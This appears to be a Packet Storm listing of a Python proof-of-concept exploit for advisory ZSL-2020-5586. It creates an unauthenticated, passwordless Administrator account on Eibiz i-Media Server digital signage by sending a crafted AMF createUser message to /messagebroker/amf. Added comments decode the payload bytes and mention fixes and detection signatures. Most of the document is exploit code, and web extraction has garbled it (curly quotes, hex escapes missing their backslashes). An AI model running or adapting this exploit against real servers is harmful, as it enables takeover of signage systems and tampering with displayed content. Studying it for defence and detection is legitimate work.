Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass ≈ Packet Storm – Digitalmunition





Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass ≈ Packet Storm

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: <=3.8.0
#
# Summary: EIBIZ develops an advertising platform for out-of-home media, which at
# that time the world called “Digital Signage”. Because most business customers
# still need to go outside to get in touch with products and services, online
# media alone cannot serve them at the right place and the right time.
#
# Desc: The application suffers from an unauthenticated privilege escalation and
# arbitrary user creation vulnerability that allows authentication bypass.
# Once serialized, an AMF-encoded object graph may be used to persist and retrieve
# application state, or to allow two endpoints to communicate through the exchange
# of strongly typed data. These objects are received by the server without validation
# or authentication, which gives the attacker the ability to create any user with
# any role, bypass the security control in place and modify the data presented on
# the screen/billboard.
#
# =========================================================================================
#
# # python3 imedia_createUser.py 192.168.1.1 waddup
#
# –Sending serialized object…
# –Replaying…
#
# ——————————————————
# Admin user ‘waddup’ successfully created. No password.
# ——————————————————
#
# =========================================================================================
#
# Tested on: Windows Server 2016
# Windows Server 2012 R2
# Windows Server 2008 R2
# Apache Flex
# Apache Tomcat/6.0.14
# Apache-Coyote/1.1
# BlazeDS Application
#
#
# Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5586
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
#
#
# 26.07.2020
#
#

import time as go
import requests
import sys
import re

class __CreateAdmin__:
    """Proof of concept for advisory ZSL-2020-5586: unauthenticated admin-account
    creation on Eibiz i-Media Server 3.8.0 through its BlazeDS AMF endpoint.

    What the code below does, method by method:
      * usage() - reads a host and a username from argv (banner + exit otherwise).
      * amf()   - POSTs one hand-assembled AMF3 ``flex.messaging.messages.RemotingMessage``
                  to ``/messagebroker/amf`` twice. Decoding the byte string: it is
                  addressed to the ``userService`` destination, operation ``createUser``,
                  and its body is a single ``ds.model.User`` whose ``name``/``id`` are the
                  supplied username, whose ``password`` is empty and whose ``role`` is
                  ``Administrator``.
      * me()    - prints an ASCII-art banner.

    Root cause, per the advisory header: the remoting destination accepts the
    client-supplied object graph without authentication or validation. The
    server-side fix is to require an authenticated, authorised caller on the
    ``userService`` destination (and to never take the ``role`` of a new account
    from the client). For detection: POSTs with ``Content-Type: application/x-amf``
    to ``/messagebroker/amf`` from unauthenticated sessions whose body contains
    ``createUser`` and ``Administrator``. This script additionally sends a fixed
    ``User-Agent: CharlieChaplin`` and reuses constant ``DSId`` / ``messageId``
    GUIDs on both requests, which a genuine Flex client presumably would not do.

    NOTE(review): as reproduced on this page the listing is garbled by web
    extraction (typographic quotes, escape sequences missing their backslashes);
    it is kept verbatim here and only comments were added.
    """

    def __init__(self) -> None:
        """Initialise request state; the fields are populated by usage() and amf()."""
        self.ep = “/messagebroker/amf”      # BlazeDS AMF endpoint path
        self.agent = “CharlieChaplin”       # fixed User-Agent, visible in server logs
        self.amfpacket = None               # raw request body, assembled in amf()
        self.bytecount = None               # AMF3 string-length marker for the username
        self.bytesdata = None
        self.address = None                 # target base URL from argv[1]
        self.headers = None
        self.usrname = None                 # account name from argv[2]
        self.ende = None                    # closing status line printed by amf()

    def usage(self) -> None:
        """Parse argv as ``<ip> <username>``; on any other arity print the banner and exit(12).

        A bare host is prefixed with ``http://``. The check is a substring test for
        ``http``, so any address that already contains it is used as given.
        """
        if len(sys.argv) != 3:
            self.me()
            msg = “x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin”
            brd = “-” * len(msg + “x20”)
            print(“n” + brd)
            print(msg)
            print(“x20Usage: ./i-media.py [ip] [username]”)
            print(brd)
            exit(12)
        else:
            self.address = sys.argv[1]
            self.usrname = sys.argv[2]
            if not “http” in self.address:
                self.address = “http://{}”.format(self.address)

    def amf(self) -> None:
        """Assemble the AMF request body and POST it twice to ``self.address + self.ep``.

        The byte string is a pre-serialized AMF3 envelope; only the username is
        spliced in at runtime. The second POST re-sends the identical bytes
        ("Replaying"). Neither response's status nor body is inspected, so the
        closing "successfully created" line is printed unconditionally and is not
        evidence that the account actually exists.
        """
        self.headers = {“User-Agent” : self.agent,
                        “Accept” : “*/*”,
                        “Accept-Language” : “en-US,en;q=0.5”,
                        “Accept-Encoding” : “gzip, deflate”,
                        “Origin” : self.address,
                        “Connection” : “close”,
                        “Referer” : self.address + “/main.swf”,
                        “Content-Type” : “application/x-amf”}

        # AMF0 envelope: version 3, zero headers, one message with target "null",
        # response URI "/36", then a one-element array switching to AMF3 (0x11).
        self.amfpacket = b”x00x03x00x00x00x01x00x04x6E”
        self.amfpacket += b”x75x6Cx6Cx00x03x2Fx33x36x00″
        self.amfpacket += b”x00x01xB3x0Ax00x00x00x01x11″
        # AMF3 object: class flex.messaging.messages.RemotingMessage with nine
        # sealed members: source, operation, timestamp, body, clientId, headers,
        # timeToLive, destination, messageId.
        self.amfpacket += b”x0Ax81x13x4Fx66x6Cx65x78x2E”
        self.amfpacket += b”x6Dx65x73x73x61x67x69x6Ex67″
        self.amfpacket += b”x2Ex6Dx65x73x73x61x67x65x73″
        self.amfpacket += b”x2Ex52x65x6Dx6Fx74x69x6Ex67″
        self.amfpacket += b”x4Dx65x73x73x61x67x65x0Dx73″
        self.amfpacket += b”x6Fx75x72x63x65x13x6Fx70x65″
        self.amfpacket += b”x72x61x74x69x6Fx6Ex13x74x69″
        self.amfpacket += b”x6Dx65x73x74x61x6Dx70x09x62″
        self.amfpacket += b”x6Fx64x79x11x63x6Cx69x65x6E”
        self.amfpacket += b”x74x49x64x0Fx68x65x61x64x65″
        self.amfpacket += b”x72x73x15x74x69x6Dx65x54x6F”
        self.amfpacket += b”x4Cx69x76x65x17x64x65x73x74″
        self.amfpacket += b”x69x6Ex61x74x69x6Fx6Ex13x6D”
        # Values: source = null, operation = "createUser", timestamp = 0,
        # body = array of one element.
        self.amfpacket += b”x65x73x73x61x67x65x49x64x01″
        self.amfpacket += b”x06x15x63x72x65x61x74x65x55″
        self.amfpacket += b”x73x65x72x04x00x09x03x01x0A”
        # Body element: class ds.model.User with fifteen sealed members: password,
        # create, tel, fax, name, address, update, id, mobile, uDelete, department,
        # role, read, email, company.
        self.amfpacket += b”x81x73x1Bx64x73x2Ex6Dx6Fx64″
        self.amfpacket += b”x65x6Cx2Ex55x73x65x72x11x70″
        self.amfpacket += b”x61x73x73x77x6Fx72x64x0Dx63″
        self.amfpacket += b”x72x65x61x74x65x07x74x65x6C”
        self.amfpacket += b”x07x66x61x78x09x6Ex61x6Dx65″
        self.amfpacket += b”x0Fx61x64x64x72x65x73x73x0D”
        self.amfpacket += b”x75x70x64x61x74x65x05x69x64″
        self.amfpacket += b”x0Dx6Dx6Fx62x69x6Cx65x0Fx75″
        self.amfpacket += b”x44x65x6Cx65x74x65x15x64x65″
        self.amfpacket += b”x70x61x72x74x6Dx65x6Ex74x09″
        self.amfpacket += b”x72x6Fx6Cx65x09x72x65x61x64″
        self.amfpacket += b”x0Bx65x6Dx61x69x6Cx0Fx63x6F”
        # User values begin: password = "" (the account is created without one),
        # create = true, tel = "", fax = "", then name = <username>.
        self.amfpacket += b”x6Dx70x61x6Ex79x06x01x03x06″
        self.amfpacket += b”x01x06x01x06″ ##################”
        # AMF3 string header for the username, (length << 1) | 1 computed as
        # len(name*2)+1 and emitted as a single byte, followed by the UTF-8 name.
        self.bytecount = len(self.usrname * 2) + 1
        self.bytesdata = [self.bytecount]
        self.amfpacket += “”.join(map(chr, self.bytesdata))
        self.amfpacket += (bytes(self.usrname.encode(“utf-8”)))
        # Remaining User values: address = "", update = true, id = back-reference
        # to the username string, mobile = "", uDelete = true, department = "",
        # role = "Administrator", read = true, email = "", company = "".
        self.amfpacket += b”x06x01x03x06x36x06x01x03x06″
        self.amfpacket += b”x01x06x1Bx41x64x6Dx69x6Ex69″
        self.amfpacket += b”x73x74x72x61x74x6Fx72x03x06″
        # clientId = null; headers = anonymous object {DSEndpoint: "my-amf",
        # DSId: "96B0BF8C-A11A-8A24-81C1-587EA3ACA38C"} (GUID decoded from the
        # bytes below; constant on every run); timeToLive = 0.
        self.amfpacket += b”x01x06x01x01x0Ax0Bx01x15x44″
        self.amfpacket += b”x53x45x6Ex64x70x6Fx69x6Ex74″
        self.amfpacket += b”x06x0Dx6Dx79x2Dx61x6Dx66x09″
        self.amfpacket += b”x44x53x49x64x06x49x39x36x42″
        self.amfpacket += b”x30x42x46x38x43x2Dx41x31x31″
        self.amfpacket += b”x41x2Dx38x41x32x34x2Dx38x31″
        self.amfpacket += b”x43x31x2Dx35x38x37x45x41x33″
        self.amfpacket += b”x41x43x41x33x38x43x01x04x00″
        # destination = "userService"; messageId =
        # "99FECCF9-4A8D-FF41-1A66-BF912EBBD656" (also constant, reused by the replay).
        self.amfpacket += b”x06x17x75x73x65x72x53x65x72″
        self.amfpacket += b”x76x69x63x65x06x49x39x39x46″
        self.amfpacket += b”x45x43x43x46x39x2Dx34x41x38″
        self.amfpacket += b”x44x2Dx46x46x34x31x2Dx31x41″
        self.amfpacket += b”x36x36x2Dx42x46x39x31x32x45″
        self.amfpacket += b”x42x42x44x36x35x36″ ##########”

        print(“n–Sending serialized object…”)
        req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
        #print(req.text.encode(“utf-8”))
        go.sleep(2)
        # Same bytes, same messageId, sent again two seconds later.
        print(“–Replaying…”)
        req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
        #print(req.text.encode(“utf-8”))
        # Printed regardless of what the server answered (see docstring).
        self.ende = “Admin user ‘” + self.usrname + “‘ successfully created. No password.”
        print   # Python 2 leftover: a bare name, a no-op expression under Python 3
        print(“-” * len(self.ende))
        print(self.ende)
        print(“-” * len(self.ende))

    def me(self) -> None:
        """Write the ASCII-art banner to stdout one character at a time (0.1 ms apart)."""
        cc = “””

/`,.,,,.
:…….,,
,………7
,………$
……:=+=$
I…..,,:~,.:
$.?7IZDDNNN~.
$$: 8D=:I D,
D~,7NI7DNN
DDD NNN:
D8.ININ;
D8?7DZS
.ZDNNND D
S..,.~8?,N OO77
N……,..$=77:+?=~8
:……,::=.I8?:+=.=+~++
=…….,:+$=+O:+==~~++++=
8………..~7D$::~..~====:++
I………….:+…..~~~=~:~+?
N,…………. .+…,:~=+~~ :+=$
;……. ……, .,….,:=+:,..~=?
Z,,…… :…………,::~~=…===I
=…….$ Z…… =~,,,,.,:~,…,7~=
+……. 8…..,.=~~~:.~~~=:~ ..:$==
,…… +,..,,:.=~:~+I:,+I=8:…=?~
,….., =…,,,8+=,:~=~I=~~ N…:+?
,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=?
8…… ,…7=Z$DN:?::=I~~$ =..,=+
…,..D ,….O88D,8D,:=:==+?? …,:7
,….7 ,..:$Z8D8=8DZ~~=~+==? :..:~+
……8D .. …. :?~8D:.:~~=++ ..,~II
:….~D+: . . . ..,..==~===N +,.,=$
,. DDND………. .,…,===+=N ..,+?Z
DD 88 ………. ….,..~+=~N ..,~?I
……. ,,.,,.:…=?? 8..~=I$
……. …,,,,. ,:~= ..:=~?
…….. ,.,,..,:.. I.:+?+D
……. …….,:,,8 ,..IN
…….. .,.. ..,,:.: :8N
…….. … ..,::,, I+O
…….. ……,:,. O.ZN
…….. . . …,,,,. D+
………… ….,,,. =
……. . ….,,, ?
……. …..,,, 7
…… . ..,,,, +
:….. ..,.,, 8
:……. =. …..,,,N 8
~……. D. …..,,,D 8
~……. D. . …,,,O D
=…. …..,,Z ?`
+…… . :……..,.$ +
I…… ……..,.7 =
Z…….. . . ….,,7 D
N….. … . ……..I 8
….. … , ……..I 8
…… . = .. …..I 7
:.. . ..7 8… …..I ?
Z.. D .. ….7 N NND88OOOOOOO88DN
O.. . .. ….O O D8OZ$77II777$$ZO8DN
… . .. . …..N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN
.,. ….O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N
$.. …88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN
… … ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N
Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N
=.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN
… .?, I777IIIIIIIII7$~O8N NNNNN
8…. .I. …7IIIIII7$Z8DD NNNNN
NND=….~,=~ …+I . . ..I$$ZO8DN NN NNNNN
N.+?~.~,=~=… … $O.. . …~:..=IINN $NNN
?,:..:,.=N I…..,,=I+ N8
~….,8

“””

        # Typewriter effect: one character per write, with a tiny sleep between.
        j = 0
        while j < len(cc):
            char = cc[j]
            sys.stdout.write(char)
            go.sleep(10.0 / 100000.0)
            j = j + 1

    def main(self) -> None:
        """Entry point: read the arguments, then build and send the request."""
        self.usage()
        self.amf()

# Script entry point. The class name uses the dunder form (``__CreateAdmin__``),
# which PEP 8 reserves for language-defined names; cosmetic only.
if __name__ == ‘__main__’:
    __CreateAdmin__().main()
